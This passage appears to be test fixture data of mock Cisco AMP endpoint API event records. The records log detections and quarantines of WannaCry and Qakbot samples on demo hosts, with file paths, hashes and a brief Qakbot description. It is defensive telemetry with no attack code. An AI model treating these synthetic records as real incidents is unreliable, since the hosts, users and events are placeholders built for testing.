found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":166000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229327140847659","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225761,"description":"Cannot delete"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":166000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229327140847657","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete 
pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":572000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229331435814973","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":120000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Ransom:Gen.20gl.1201","detection_id":"6419229331435814969","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"u.wnry","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\u.wnry","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25","sha1":"45356a9dd616ed7161a3b9192e2f318d0ab5ad10","md5":"7bf2b57f2a205768755c07f238fb32cc"},"parent":{"process_id":1008,"disposition":"Malicious","file_name":"tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":73000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229331435814970","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":26000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.Ransom:Gen.20gl.1201","detection_id":"6419229331435814968","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":166000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Threat 
Quarantined","event_type_id":553648143,"detection_id":"6419229327140847660","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":166000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419229327140847658","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":166000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419229322845880359","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229327140848000,"timestamp":1610635264,"timestamp_nanoseconds":870000000,"date":"2021-01-14T14:41:04+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229327140847671","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229327140848000,"timestamp":1610635264,"timestamp_nanoseconds":698000000,"date":"2021-01-14T14:41:04+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419229327140847666","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"},"parent":{"process_id":5748,"disposition":"Clean","file_name":"cmd.exe","identity":{"sha256":"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae","sha1":"ee8cbf12d87c4d388f09b4f69bed2e91682920b5","md5":"ad7b9c14083b52bc532fba5948342b98"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229327140848000,"timestamp":1610635264,"timestamp_nanoseconds":667000000,"date":"2021-01-14T14:41:04+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419229327140847665","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"},"parent":{"process_id":4772,"disposition":"Malicious","file_name":"tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229327140848000,"timestamp":1610635264,"timestamp_nanoseconds":28000000,"date":"2021-01-14T14:41:04+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.Gen.20gl.1201","detection_id":"6419229327140847656","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\WINDOWS\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"},"parent":{"process_id":708,"disposition":"Clean","file_name":"lsass.exe","identity":{"sha256":"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71","sha1":"7abcc82dc5a05b4f53fd0fbd386738e5555025cf","md5":"4e568dbe3fff1a0025eb432dc929b78f"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229322845880000,"timestamp":1610635263,"timestamp_nanoseconds":950000000,"date":"2021-01-14T14:41:03+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.Gen.20gl.1201","detection_id":"6419229322845880359","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"},"parent":{"process_id":708,"disposition":"Clean","file_name":"lsass.exe","identity":{"sha256":"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71","sha1":"7abcc82dc5a05b4f53fd0fbd386738e5555025cf","md5":"4e568dbe3fff1a0025eb432dc929b78f"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411488666497057000,"timestamp":1610635060,"timestamp_nanoseconds":913000000,"date":"2021-01-14T14:37:40+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6411488666497056775","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not 
found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411488666497057000,"timestamp":1610635060,"timestamp_nanoseconds":913000000,"date":"2021-01-14T14:37:40+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6411488666497056774","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91"}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411488666497057000,"timestamp":1610635060,"timestamp_nanoseconds":913000000,"date":"2021-01-14T14:37:40+00:00","event_type":"Retrospective Quarantine","event_type_id":553648155,"detection_id":"6411488666497056773","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411488666497057000,"timestamp":1610635060,"timestamp_nanoseconds":398000000,"date":"2021-01-14T14:37:40+00:00","event_type":"Retrospective 
Detection","event_type_id":553648147,"detection":"W32.DD6D4FEDD3-100.SBX.TG","detection_id":"6411488666497056775","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"qYf.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\Documents\\qYf.exe","identity":{"sha256":"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411488666497057000,"timestamp":1610635060,"timestamp_nanoseconds":398000000,"date":"2021-01-14T14:37:40+00:00","event_type":"Retrospective 
Detection","event_type_id":553648147,"detection":"W32.DD6D4FEDD3-100.SBX.TG","detection_id":"6411488666497056774","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"4191700.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\4191700.exe","identity":{"sha256":"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411488666497057000,"timestamp":1610635060,"timestamp_nanoseconds":398000000,"date":"2021-01-14T14:37:40+00:00","event_type":"Retrospective 
Detection","event_type_id":553648147,"detection":"W32.DD6D4FEDD3-100.SBX.TG","detection_id":"6411488666497056773","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"MspthrdHash.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\MspthrdHash\\MspthrdHash.exe","identity":{"sha256":"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91","sha1":"8cf0ca99a8f5019d8583133b9a9379299c45470c","md5":"6894b3834bd541fa85df79e44568acac"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1493058569636000800,"timestamp":1610633340,"timestamp_nanoseconds":636000000,"date":"2021-01-14T14:09:00+00:00","event_type":"Cloud 
IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Critical","start_timestamp":1610633340,"start_date":"2021-01-14T14:09:00+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"Qakbot is a worm that spreads through network shares and removable drives. It downloads additional files, steals information, and opens a back door on the compromised computer. The worm also contains rootkit functionality to allow it to hide its presence. A command or file path similar to one used by Qakbot for spreading across the network or persistence was seen.","short_description":"W32.Qakbot.ioc"},"file":{"disposition":"Clean","file_name":"cmd.exe","file_path":"/C:/Windows/SysWOW64/cmd.exe","identity":{"sha256":"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae"},"parent":{"disposition":"Malicious","identity":{"sha256":"b9c3eea0c27244f91cce86d57aca2b3f8d09f1dbd6274751226c6b09398a7ba4"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6264772016730014000,"timestamp":1610631960,"timestamp_nanoseconds":611000000,"date":"2021-01-14T13:46:00+00:00","event_type":"Retrospective 
Quarantine","event_type_id":553648155,"detection_id":"6264772016730013699","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Low_Prev_Retro","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"df:d1:ed:2d:c8:fc"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6264772016730014000,"timestamp":1610631960,"timestamp_nanoseconds":65000000,"date":"2021-01-14T13:46:00+00:00","event_type":"Retrospective 
